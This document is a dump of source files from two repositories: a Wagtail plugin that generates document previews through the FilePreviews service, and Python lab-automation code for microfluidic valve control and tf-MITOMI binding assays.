repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/models.py | <filename>wagtaildocs_previews/models.py
from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from filepreviews import FilePreviews
from jsonfield import JSONField
from model_utils import FieldTracker
from wagtail.contrib.settings.models import BaseSetting, register_setting
from wagtail.core.models import Site
from wagtail.documents.models import AbstractDocument
from .settings import previews_options_callback
@register_setting
class FilePreviewsSettings(BaseSetting):
api_key = models.CharField(max_length=255)
api_secret = models.CharField(max_length=255)
class Meta:
verbose_name = 'FilePreviews'
@property
def is_enabled(self):
return self.api_key and self.api_secret
class AbstractPreviewableDocument(AbstractDocument):
preview_data = JSONField(blank=True, null=True)
class Meta:
abstract = True
verbose_name = _('document')
class PreviewableDocument(AbstractPreviewableDocument):
admin_form_fields = [
'title',
'file',
'collection',
'tags',
'preview_data'
]
tracker = FieldTracker(fields=['file'])
@receiver(post_save, sender=PreviewableDocument)
def document_save(sender, instance, created, **kwargs):
previous_file = instance.tracker.previous('file')
file_changed = previous_file != instance.file
should_generate_preview = False
if created and file_changed:
should_generate_preview = True
if not created and file_changed:
should_generate_preview = True
if not should_generate_preview:
return
site = Site.objects.get(is_default_site=True)
settings = FilePreviewsSettings.for_site(site)
if settings.is_enabled:
fp = FilePreviews(
api_key=settings.api_key,
api_secret=settings.api_secret
)
host_url = site.root_url
document_url = '{}{}'.format(host_url, instance.url)
callback_url = '{}{}'.format(host_url, reverse('filepreviews_webhook'))
options = {
'callback_url': callback_url,
'data': {
'document_id': instance.pk
}
}
options.update(previews_options_callback(instance))
fp.generate(document_url, **options)
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/tests/test_views.py | <reponame>mikiec84/wagtail-filepreviews
import json
from django.test import TestCase
from django.urls import reverse
from wagtaildocs_previews.models import PreviewableDocument
class TestWebhookView(TestCase):
def setUp(self):
self.url = reverse('filepreviews_webhook')
self.document = PreviewableDocument.objects.create(
title='Test document'
)
def test_post_returns_success(self):
post_data = {
'user_data': {
'document_id': self.document.id
}
}
response = self.client.post(
self.url, json.dumps(post_data), content_type='application/json'
)
self.assertEqual(response.content.decode('utf8'), '{"success": true}')
def test_post_updates_document(self):
post_data = {
'user_data': {
'document_id': self.document.id
}
}
self.client.post(
self.url, json.dumps(post_data), content_type='application/json'
)
document = PreviewableDocument.objects.get(pk=self.document.pk)
self.assertEqual(document.preview_data, post_data)
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/endpoints.py | from wagtail.documents.api.v2 import endpoints
from .serializers import DocumentSerializer
class DocumentsAPIEndpoint(endpoints.DocumentsAPIEndpoint):
base_serializer_class = DocumentSerializer
body_fields = endpoints.DocumentsAPIEndpoint.body_fields + ['preview_data']
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/serializers.py | from rest_framework.serializers import JSONField
from wagtail.documents.api.v2 import serializers
class DocumentSerializer(serializers.DocumentSerializer):
preview_data = JSONField(read_only=True)
|
mikiec84/wagtail-filepreviews | wagtaildocs_previews/tests/urls.py | <gh_stars>10-100
from __future__ import absolute_import, unicode_literals
from django.conf.urls import include, url
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtaildocs_previews import urls as wagtaildocs_urls
urlpatterns = [
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'', include(wagtail_urls)),
]
|
FordyceLab/RunPack-STAMMP | runpack-stammp/valvecontrol.py | <reponame>FordyceLab/RunPack-STAMMP
# title : valvecontrol.py
# description : Valve control for RunPack experimental acquisition
# authors : <NAME>
# credits : <NAME>
# date : 20180520
# version update : 20200913
# version : 0.1.1
# python_version : 2.7
import time
from acqpack import gui
from runpack.io import HardwareInterface as hi
from runpack.io import ExperimentalHarness as eh
################################################################################
def launchGui():
"""Wrapper for AcqPack manifold-controlling widget.
Args:
None
Returns:
None
"""
gui.manifold_control(hi.m, hi.valveReferenceIndex)
def open(reference, valveName, logging = True):
"""Opens a valve.
Args:
reference (str): valvemap reference name
valveName (str): Valve name as per valvemap
logging (bool); flag to log valve state change
Returns:
None
"""
hi.m.open(reference, valveName)
if logging:
eh.valvelogger.info('Opened {}'.format(valveName))
def close(reference, valveName, logging = True):
"""Closes a valve.
Args:
reference (str): valvemap reference name
valveName (str): Valve name as per valvemap
logging (bool); flag to log valve state change
Returns:
None
"""
hi.m.close(reference, valveName)
if logging:
eh.valvelogger.info('Closed {}'.format(valveName))
def openValves(devices, valves, reference = hi.valveReferenceIndex, logging = True):
"""Opens specified valves of specified devices.
If one valve is given, that valve is opened on all devices.
Args:
devices (list): list of devices (e.g. ['d1', 'd2', and 'd3'])
valves (list): list of valves. (e.g. ['bb'] or ['bb, na, out'])
Returns:
None
"""
dnums = [dname[-1] for dname in devices]
for dnum in dnums:
for valve in valves:
time.sleep(0.005)
open(reference, valve+str(dnum), logging = False)
if logging:
eh.valvelogger.info('Opened Valve(s) {} for Device(s) {}'.format(valves, devices))
def closeValves(devices, valves, reference= hi.valveReferenceIndex, logging = True):
"""Closes specified valves of specified devices.
If one valve is given, that valve is closed on all devices.
Args:
devices (list | tuple): list of devices (e.g. ['d1', 'd2', and 'd3'])
valves (list | tuple): list of valves. (e.g. ['bb'] or ['bb, na, out'])
Returns:
None
"""
dnums = [dname[-1] for dname in devices]
for dnum in dnums:
for valve in valves:
time.sleep(0.005)
close(reference, valve+str(dnum), logging = False)
if logging:
eh.valvelogger.info('Closed Valve(s) {} for Device(s) {}'.format(valves, devices))
def returnToSafeState(devices, valves = 'all', reference = 'chip', logging = True):
"""Closes all valving of specified type
If valves = 'all', shuts all inlets/outlets, depresses buttons, sandwiches,
and necks
Note: flowValves ['w','bb','na','ph','ext1','ext2','prot', 'hep','out','in']
controlValves ['neck','b1','b2','s1','s2']
Args:
devices (list | tuple): list of devices to return to safe state (name
only, e.g. 'd1')
valves (str): which valving to shut ('all', 'flow', or 'control')
Returns:
None
"""
if valves == 'all':
for device in devices:
closeValves(devices, hi.flowValves, logging = False)
closeValves(devices, hi.controlValves, logging = False)
if logging:
eh.valvelogger.info('Closed all valves for devices {}'.format(devices))
elif valves == 'flow':
for device in devices:
closeValves(devices, hi.flowValves, logging = False)
if logging:
eh.valvelogger.info('Closed flow valves for devices {}'.format(devices))
elif valves == 'control':
for device in devices:
closeValves(devices, hi.controlValves, logging = False)
if logging:
eh.valvelogger.info('Closed control valves for devices {}'.format(devices)) |
FordyceLab/RunPack-STAMMP | runpack-stammp/tfMITOMIProtocols.py | # title : tfMITOMIprotocols.py
# description : tf-MITOMI-specific protocols for experimental acquisition notebook
# authors : <NAME>, <NAME>, <NAME>
# credits : <NAME>
# date : 201711015
# version update : 20200913
# version : v0.1
# python_version : 2.7
from runpack import valvecontrol as vc
from runpack import imagingcontrol as ic
from runpack.io import ExperimentalHarness as eh
from Queue import Queue
import numpy as np
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
import time
def flowOligoStartAssay(deviceName, substrateInput, bufferInput, KineticAcquisition, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800, washoutTime = 600, postEquilibImageChanExp = {'5cy5':[30]}, postWashImageChanExp = {'5cy5':[30], '4egfp':[500]}, performImaging = True):
"""
Description of assay here
"""
eh.scriptlogger.info('>> Flowing oligo, starting assay ' + 'for device ' + deviceName + ' in lines ' + str(substrateInput))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for oligo in ' + str(substrateInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for oligo in ' + str(substrateInput))
#Expose chip to oligo, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInput))
vc.closeValves([deviceName], ['w'])
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInput))
#Close things to prep for assay, and open buttons
vc.closeValves([deviceName], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(0.5)
vc.openValves([deviceName], ['b1', 'b2'])
#Start the assay
if performImaging:
eh.scriptlogger.info('Binding oligo to buttons, starting kinetic acquisition' + str(substrateInput))
KineticAcquisition.startAssay(eh.rootPath, eh.posLists[deviceName], scanQueueFlag = sendToQueue)
else:
eh.scriptlogger.info('Binding oligo to buttons, no kinetics' + str(substrateInput))
time.sleep(bindingTime)
# Obtain pre-wash Cy5 no matter what
ic.scan(eh.rootPath, postEquilibImageChanExp, deviceName, KineticAcquisition.note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[deviceName], wrappingFolder = True)
#Close things to prep for assay, and open buttons
eh.scriptlogger.info('The inlet tree wash started for buffer in ' + str(bufferInput))
vc.returnToSafeState([deviceName])
vc.openValves([deviceName], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInput))
# Flow buffer through chip
vc.closeValves([deviceName], ['w'])
vc.closeValves([deviceName], ['b1', 'b2'])
time.sleep(0.5)
vc.openValves([deviceName], ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
vc.closeValves([deviceName], [bufferInput[:-1], 'in', 's1', 's2', 'out'])
ic.scan(eh.rootPath, postWashImageChanExp, deviceName, KineticAcquisition.note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[deviceName], wrappingFolder = True)
def flowOligoStartAssaysConcurrent(deviceNames, substrateInputs, bufferInputs, notes, equilibrationTime = 600, treeFlushTime = 20, bindingTime = 1800,
washoutTime = 600, postEquilibImageChanExp = {'5cy5':[80]}, postWashImageChanExp = {'5cy5':[1500], '4egfp':[500]}):
"""
Performs binding assay for a single oligo concentration.
Procedure:
1) Flush inlet tree
2) Flow oligo onto device
3) Close sandwiches, open buttons, wait 30 min
4) Prewash Cy5 imaging
5) Close buttons, wash 10 min
6) Postwash Cy5 and eGFP imaging
Arguments
(list) deviceNames: list of the name of devices
(list) substrate inputs: list of input for DNA on each device
(list) buffer inputs: PBS inlets for both devices
(list) notes: oligo identities, in order of device name
equilibrationTime: time (sec) for equilibration of protein and DNA (in seconds), standard is 30 minutes
treeFlushTime: time (sec) for flushing inlet tree of oligo before introducing onto device
bindingTime: time (sec) for equilibrating TF-DNA interaction
washoutTime: time (sec) for washing through buffer post binding measurement.
postEquilibImageChanExp: prewash Cy5 image channel and exposure settings
postWashImageChanExp: channels and exposures for postwash eGFP and Cy5 imaging
"""
eh.scriptlogger.info('>> Flowing oligo, starting assay for device {} in lines {}'.format(str(deviceNames), str(substrateInputs)))
# Flush the inlet tree
eh.scriptlogger.info('The inlet tree wash started for oligo in {}'.format(str(substrateInputs)))
vc.returnToSafeState(deviceNames)
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.openValves([device], [substrateInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for oligo in ' + str(substrateInput))
#Flow oligo onto device, equilibrate for equilibrationTime
eh.scriptlogger.info('Chip equilibration started for substrate in ' + str(substrateInputs))
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(equilibrationTime)
eh.scriptlogger.info('Chip equilibration done for substrate in ' + str(substrateInputs))
#Close things to prep for assay, and open buttons
for device, substrateInput in list(zip(deviceNames, substrateInputs)):
vc.closeValves([device], [substrateInput[:-1], 'in', 'out', 's1', 's2'])
time.sleep(1)
vc.openValves(deviceNames, ['b1', 'b2'])
eh.scriptlogger.info('Binding oligo to buttons, no kinetics' + str(substrateInputs))
time.sleep(bindingTime)
# Obtain pre-wash Cy5 no matter what
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postEquilibImageChanExp, device, note.replace(" ", "_")+'_PreWash_Quant', eh.posLists[device], wrappingFolder = True)
#Close things to prep for assay, and open buttons
eh.scriptlogger.info('The inlet tree wash started for buffers in ' + str(bufferInputs))
vc.returnToSafeState(deviceNames)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
eh.scriptlogger.info('The inlet tree wash done for buffer in ' + str(bufferInputs))
# Flow buffer through chip
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['w'])
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(0.5)
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'in', 'out'])
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, postWashImageChanExp, device, note.replace(" ", "_")+'_PostWash_Quant', eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
def trypsinDigest(deviceNames, bufferInputs, trypInputs, bBSAInputs, assayBufferInputs, washoutTime = 600, treeFlushTime=30, trypsinWashTime = 900):
"""
Trypsin digest post protein-binding
Procedure:
1. Flow buffer
2. Flow trypsin 15 min
3. Wash buffer for 10 min
4. Flow bBSA for 15 minutes
5. Wash buffer for 10 minutes
Arguments:
(list) deviceNames: list of device names ()
(list) bufferInputs: list of buffer inputs
(list) trypInputs: list of trypsin inputs
(list) bBSAInputs: list of bBSA inputs
(int) washoutTime: time (seconds) buffer flowed through
(int) treeFlushTime: time (seconds) reagent flushed to waste to remove air
(int) trypsinWashTime: time (seconds) of flowing trypsin and bBSA in device
Returns:
None
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Trypsin Digest')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#flow trypsin through device
eh.scriptlogger.info('Started flowing trypsin to waste')
for device, bufferInput in list(zip(deviceNames, trypInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing trypsin through devices for protein cleaning ' + str(trypInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing trypsin through devices ' + str(trypInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, trypInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#wash trypsin away
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
#wash bBSA in device
eh.scriptlogger.info('Started bBSA to waste')
for device, bBSAInput in list(zip(deviceNames, bBSAInputs)):
vc.openValves([device], [bBSAInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing bBSA through devices for surface regeneration ' + str(bBSAInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing bBSA through devices ' + str(bBSAInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, bBSAInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
#flow buffer through to wash away bBSA
# for device, bufferInput in list(zip(deviceNames, bufferInputs)):
# vc.openValves([device], [bufferInput[:-1], 'w'])
# time.sleep(treeFlushTime)
# vc.closeValves(deviceNames, ['w'])
# eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
# vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
# time.sleep(washoutTime)
# eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
# vc.closeValves(deviceNames, ['in'])
# for device, bufferInput in list(zip(deviceNames, bufferInputs)):
# vc.closeValves([device], [bufferInput[:-1], 'w'])
#let protein sit in assay buffer
eh.scriptlogger.info('Started assay buffer')
for device, bufferInput in list(zip(deviceNames, assayBufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing assay buffer through devices for equilibration ' + str(assayBufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(trypsinWashTime)
eh.scriptlogger.info('Done flowing assay buffer through devices ' + str(assayBufferInputs))
vc.closeValves(deviceNames, ['in'])
for device, bufferInput in list(zip(deviceNames, assayBufferInputs)):
vc.closeValves([device], [bufferInput[:-1], 'w'])
vc.returnToSafeState(deviceNames)
def removeOligo(deviceNames, bufferInputs, openTime = 120, washoutTime = 300, treeFlushTime=20, washoutSteps = 2):
"""
Refreshes a device following an oligo titration series.
Procedure:
1. Flow buffer
2. Shut sandwiches, open buttons (wait 2 min)
3. Shut buttons, open sandwiches (wait 2 min)
4. Flow buffer 5 min and repeat 2-3
Arguments:
(list) deviceNames: list of device names ()
(list) bufferInputs: list of buffer inputs
(int) openTimes: time (seconds) buttons remain open during oligo release step
(int) washoutTime: time (seconds) buffer flowed through to remove oligo
(int) treeFlushTime: time (seconds) reagent flushed to waste to remove air
(int) washoutSteps: number of times to run Procedure
Returns:
None
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Oligo removal/protein refresh')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(300)
eh.scriptlogger.info('Done flowing buffer through devices for washout ' + str(bufferInputs))
for i in range(washoutSteps):
eh.scriptlogger.info('Started washout step {} of {}'.format(i+1, washoutSteps))
vc.closeValves(deviceNames, ['s1','s2']) #close sandwiches
time.sleep(5)
vc.openValves(deviceNames, ['b1','b2']) #open buttons
eh.scriptlogger.info('Closed sandwiches and opened buttons' + str(deviceNames))
time.sleep(openTime)
vc.closeValves(deviceNames, ['b1', 'b2'])
time.sleep(5)
vc.openValves(deviceNames, ['s1','s2'])
eh.scriptlogger.info('Closed buttons and opened sandwiches {} for {}s'.format(str(deviceNames), washoutTime))
time.sleep(washoutTime)
time.sleep(washoutTime)
eh.scriptlogger.info('Finished additional washout ' + str(bufferInputs))
eh.scriptlogger.info('Finished Oligo Removal/Protein refresh')
vc.returnToSafeState(deviceNames)
def dissociationConcurrent(deviceNames, bufferInputs, notes, points=20, dutyCycle = 1, washoutTime = 600, exposures = {'5cy5':[1500], '4egfp': [500]}):
"""
Performs dissociation for oligo post binding assay.
Procedure:
1) Flow buffer onto device
2) shut sandwich values (wait 5 seconds)
3) open buttons (wait for duty cycle duration)
4) shut buttons
5) wash device
6) Cy5 and eGFP imaging
Arguments:
(list) deviceNames: list of the name of devices
(list) bufferInputs: list of the input for wash buffer on each device
(list) notes: oligo identities, in order of device name
points: number of measurements to be taken
dutyCycle: time (sec) button should remain open
washoutTime: time (sec) buffer is flowed onto device
exposures: channels and exposure for kinetic acquisition
"""
eh.scriptlogger.info('>> Beginning dissociation curves for device {} with duty cycle {} seconds'.format(str(deviceNames), str(dutyCycle)))
vc.returnToSafeState(deviceNames)
#open in and out valves
vc.openValves(deviceNames,['in','out'])
for x in xrange(0, points):
eh.scriptlogger.info('>> Beginning time point {} of {}'.format(str(x+1),str(points)))
eh.scriptlogger.info('Shutting sandwich valves')
vc.closeValves(deviceNames,['s1','s2'])
time.sleep(5)
eh.scriptlogger.info('Opening button valves')
vc.openValves(deviceNames,['b1','b2'])
time.sleep(dutyCycle)
vc.closeValves(deviceNames,['b1','b2'])
eh.scriptlogger.info('Shut button valves')
time.sleep(5)
eh.scriptlogger.info('Opening sandiwch valves for wash')
vc.openValves(deviceNames, ['s1','s2'])
time.sleep(5)
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1]])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
for device, note in list(zip(deviceNames, notes)):
ic.scan(eh.rootPath, exposures, device, note.replace(" ", "_")+'_KineticAcquisition_Point_'+str(x), eh.posLists[device], wrappingFolder = True)
vc.returnToSafeState(deviceNames)
def continuousImagingbyRaster(deviceNames, notes, exposures = {'5cy5': [100], '4egfp': [500]}, incubationTime = 5400):
"""
Raster over devices and take images with given exposures until incubation time is reached
returns dictionary of scan record dataframes
"""
eh.scriptlogger.info('Imaging continuously by rastering across device(s) during DNA incubation')
startTime = time.time()
count = 0
scan_records = {}
timeElapsed = 0
while timeElapsed < incubationTime:
for device, note in list(zip(deviceNames, notes)):
scan_records[(count, device)] = ic.scan(eh.rootPath, exposures, device, note.replace(" ", "_")+'_BindingRate_Point_'+str(count), eh.posLists[device], wrappingFolder = True)
count += 1
timeElapsed = time.time() - startTime
return scan_records
def flowProteinandDNA(deviceNames, bufferInputs, DNAInputs, proteinInputs, proteinFlowTime=1800, washoutTime=600, treeFlushTime=20, incubationTime=3600):
"""
intended for BET-seq.
following surface chemistry, flow protein for 30 mins.
then wash out with PBS for 10 mins.
then flow DNA for 10 mins.
then allow DNA to bind for 60 mins.
close buttons.
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
#flow protein to waste, then over chip
for device, proteinInput in list(zip(deviceNames, proteinInputs)):
vc.openValves([device], [proteinInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing protein through devices ' + str(proteinInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2', 'b1', 'b2'])
time.sleep(proteinFlowTime)
for device, proteinInput in list(zip(deviceNames, proteinInputs)):
vc.closeValves([device], [proteinInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing protein through devices ' + str(proteinInputs))
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
# open DNA lines to waste
for device, DNAInput in list(zip(deviceNames, DNAInputs)):
vc.openValves([device], [DNAInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing DNA through devices for binding ' + str(DNAInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
time.sleep(washoutTime)
for device, DNAInput in list(zip(deviceNames, DNAInputs)):
vc.closeValves([device], [DNAInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Finished flowing DNA through devices for binding ' + str(DNAInputs))
eh.scriptlogger.info('Allowing DNA to bind for %.1f minutes' % (incubationTime/60.0))
time.sleep(incubationTime)
vc.returnToSafeState(deviceNames)
def BETseqElute(deviceNames, bufferInputs, treeFlushTime=20):
"""
actuate buttons 300 times with 3 second button cycles under constant PBS flow
"""
#enforce safe state (everything shut)
vc.returnToSafeState(deviceNames)
# Flow buffer through chip
eh.scriptlogger.info('Elute bound DNA')
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
# begin button actuations to elute DNA from device
dutyCycle = 3
numCycles = 300
for cycle in range(numCycles):
eh.scriptlogger.info('Cycle number ' + str(cycle+1))
vc.openValves(deviceNames,['b1','b2'])
time.sleep(dutyCycle)
vc.closeValves(deviceNames,['b1','b2'])
time.sleep(5)
vc.returnToSafeState(deviceNames)
def runAssaywithKinetics(deviceNames, notes, bufferInputs, competitorInputs, points, dutyCycle, washoutTime=600, prewashExposures={'5cy5':[200, 250]}, postwashExposures={'4egfp':[500],'5cy5':[3000]}, treeFlushTime=20, incubationTime=5400):
"""
start this script after letting DNA solubilize in reaction chamber
open buttons and begin imaging (low exposure times)
image continuously for 90 mins
close necks
take prewash image
close buttons
flow PBS for 10 min
take postwash images
flow competitor oligo, 10 min
run kinetics
"""
eh.scriptlogger.info('>> Starting TF-DNA binding assay')
# just to be safe, close everything (only necks should be open at this point)
vc.returnToSafeState(deviceNames)
# open buttons to begin binding and reopen necks
vc.openValves(deviceNames,['b1','b2','neck'])
# vc.openValves(deviceNames,['b1','b2'])
# image continuously for 90 mins (or specified incubation time)
### still working on this
# scan_records = continuousImagingbyRaster(deviceNames, notes, exposures=bindingExposures, incubationTime=incubationTime)
eh.scriptlogger.info('Letting oligo bind for %.1f minutes' % (incubationTime/60.0))
time.sleep(incubationTime)
# close neck valves and take prewash image
vc.closeValves(deviceNames,['neck'])
eh.scriptlogger.info('Finished binding, taking prewash images')
for device, note in list(zip(deviceNames, notes)):
prewash_note = note+'_PreWash'
ic.scan(eh.rootPath, prewashExposures, device, prewash_note, eh.posLists[device], wrappingFolder=True)
# close buttons, wash, and take postwash images
vc.closeValves(deviceNames,['b1','b2'])
# open buffer lines to waste
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.openValves([device], [bufferInput[:-1], 'w'])
eh.scriptlogger.info('Started flowing buffer through devices for washout ' + str(bufferInputs))
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out', 's1', 's2'])
time.sleep(washoutTime)
for device, bufferInput in list(zip(deviceNames, bufferInputs)):
vc.closeValves([device], [bufferInput[:-1]])
vc.closeValves(deviceNames, ['out','in'])
eh.scriptlogger.info('Finished flowing buffer through devices for washout ' + str(bufferInputs))
eh.scriptlogger.info('>> Taking postwash images')
for device, note in list(zip(deviceNames, notes)):
postwash_note = note+'_PostWash'
ic.scan(eh.rootPath, postwashExposures, device, postwash_note, eh.posLists[device], wrappingFolder=True)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.openValves([device], [competitorInput[:-1], 'w'])
time.sleep(treeFlushTime)
vc.closeValves(deviceNames, ['w'])
vc.openValves(deviceNames, ['in', 'out'])
eh.scriptlogger.info('Started flowing dark competitor through devices for washout ' + str(competitorInputs))
time.sleep(washoutTime)
for device, competitorInput in list(zip(deviceNames, competitorInputs)):
vc.closeValves([device], [competitorInput[:-1]])
vc.closeValves(deviceNames, ['in', 'out', 's1', 's2'])
eh.scriptlogger.info('Finished flowing dark competitor through devices for washout ' + str(competitorInputs))
dissociationConcurrent(deviceNames, competitorInputs, notes, points, dutyCycle, washoutTime, postwashExposures)
def runAssaywithOnOffRates(deviceNames, notes, bufferInputs, competitorInputs, points, dutyCycle, washoutTime=600, prewashExposures={'5cy5':[200, 250]}, postwashExposures={'4egfp':[500],'5cy5':[3000]}, bindingExposures={'4egfp':[500],'5cy5':[200,250]}, treeFlushTime=20, incubationTime=5400, associationCycle=2, associationPoints=30):
"""
start this script after letting DNA solubilize in reaction chamber
open buttons and begin imaging (low exposure times)
image continuously for 90 mins
close necks
take prewash image
close buttons
flow PBS for 10 min
take postwash images
flow competitor oligo, 10 min
run kinetics
"""
eh.scriptlogger.info('>> Starting TF-DNA binding assay')
# just to be safe, close everything (only necks should be open at this point)
vc.returnToSafeState(deviceNames)
# open and close buttons repeatedly to record on rate
vc.openValves(deviceNames,['b1','b2','neck'])
for i in range(associationPoints):
time.sleep(associationCycle)
vc.closeValves(deviceNames,['b1','b2'])
eh.scriptlogger.info('Taking image of TF-DNA association rate @ %d sec' % (associationCycle*(i+1)))
for device, note in list(zip(deviceNames, notes)):
associationrate_note = note+'_AssociationKinetics_'+str(i)
ic.scan(eh.rootPath, bindingExposures, device, associationrate_note, eh.posLists[device], wrappingFolder=True)
vc.openValves(deviceNames,['b1','b2'])
remainingTime = incubationTime - associationCycle*associationPoints
